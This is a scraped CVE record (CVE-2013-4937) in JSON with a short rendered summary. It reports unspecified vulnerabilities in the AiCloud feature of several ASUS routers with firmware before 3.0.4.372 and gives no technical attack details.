"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://reviews.cnet.com/8301-3132_7-57594003-98",
"refsource": "MISC",
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"name": "http://twitter.com/ASUSUSA/statuses/357612236392509440",
"refsource": "CONFIRM",
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-4937",
"datePublished": "2013-07-26T10:00:00Z",
"dateReserved": "2013-07-26T00:00:00Z",
"dateUpdated": "2024-09-17T02:46:42.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-4937 (GCVE-0-2013-4937)
Vulnerability from cvelistv5 – Published: 2013-07-26 10:00 – Updated: 2024-09-17 02:46
VLAI?
Summary
Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:40.986Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-07-26T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-4937",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://reviews.cnet.com/8301-3132_7-57594003-98",
"refsource": "MISC",
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"name": "http://twitter.com/ASUSUSA/statuses/357612236392509440",
"refsource": "CONFIRM",
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-4937",
"datePublished": "2013-07-26T10:00:00Z",
"dateReserved": "2013-07-26T00:00:00Z",
"dateUpdated": "2024-09-17T02:46:42.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}